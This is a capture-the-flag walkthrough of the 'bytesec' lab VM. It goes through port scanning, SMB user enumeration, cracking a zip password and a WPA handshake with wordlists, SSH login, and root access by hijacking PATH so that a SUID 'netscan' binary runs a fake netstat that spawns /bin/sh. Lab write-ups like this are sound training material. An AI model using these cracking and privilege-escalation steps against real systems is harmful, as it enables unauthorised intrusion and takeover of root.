For Indonesian version of this write-up, click here.
I run the VM using Virtualbox with bridged adapter. Some machine may require a specific hostname in
/etc/hosts . Otherwise, you can add the machine’s IP address into
/etc/hosts to make things more easier and simpler. Here I used
bytesec.vh as the machine’s hostname.
nmap -sV -sC -p- bytesec.vh -oN initial.nmap -v
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5ECF6AFD7D00CCBE6B3C7AA8FD31BDE8
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| 2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
| 256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_ 256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
MAC Address: 08:00:27:B3:78:46 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The server runs HTTP at port 80, SMB at 139 and 445, and SSH at 2525.
gobuster dir -u http://bytesec.vh -w /usr/share/wordlists/dirb/big.txt
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/gallery (Status: 301)
/html (Status: 301)
/img (Status: 301)
/js (Status: 301)
/news (Status: 301)
/server-status (Status: 403)
No really interesting stuff. But I found this image in
Does this machine has BlueKeep vulnerability? 😕
BlueKeep is a remote code execution vulnerability exists in Remote Desktop Services — formerly known as Terminal Services — when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (microsoft)
Enum4linux is a tool for enumerating information from Windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, netlookup, and nmblookup.
We use enum4linux to gather information like domain, OS running inside, SMB version, even the user inside a domain.
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)
From the result of enum4linux above, we got 3 user, after trying to login with each username, user
smb is the only one able to log in.
smbclient //bytesec.vh/smb -U smb -p
It turns out that the
save.zip is locked with a password, we can try to bruteforce it using
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
And we got our password cracked.
PASSWORD FOUND!!!!: pw == hacker1smb:
The content of
save.zip is one image named
secret.jpg that contains no “secret”, and a packet capture file named
After examining the
user.cap for a while, there are lots of
deauth packet. We can assume that this is a packet capture file from someone trying to capture three-way handshake between a wifi client and access point (using
aireplay). We can use
aircrack to crack the captured three-way handshake.
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
snowflake is the wifi password.
ssh to the port 2525, using the
user.cap ESSID (blackjax) and the cracked password (snowflake).
Next we can do system enumeration using linenum.sh. Make sure to run the script in
rwx directory such as
[-] SUID files:
-rwsr-xr-x 1 root root 7432 Nov 4 20:00 /usr/bin/netscan
One particular point that pretty interesting is there is files (or script?) named
netscan which has SUID/SETUID flag. SUID/SETUID flag means we can run the associated file with root permission without providing any password. Also the
netscan file is a file that usually do not exist in other normal systems.
It turns out that the
netscan is actually a “script” to run
netstat created by someone to just output the established connection. With that logic in mind we can trick the system by “changing” the
- Create a file named
echo "/bin/sh" > netstat
2. Add the
/tmp directory into
And we get the root 😃
So how does it works?
So basically we manipulate the flow of
netscan script. The script is supposed to call real
netstat which is a tool to show all active connections, but because we overwrite the environment variable (
$PATH), the script calls the fake
Actually overwriting the
$PATH is not enough to gain privilege escalation. But because
netscan has a SUID flag, the
netscan invoke the root shell instead.
That's for today, hope you guys like it *Dave Lee voice* 👋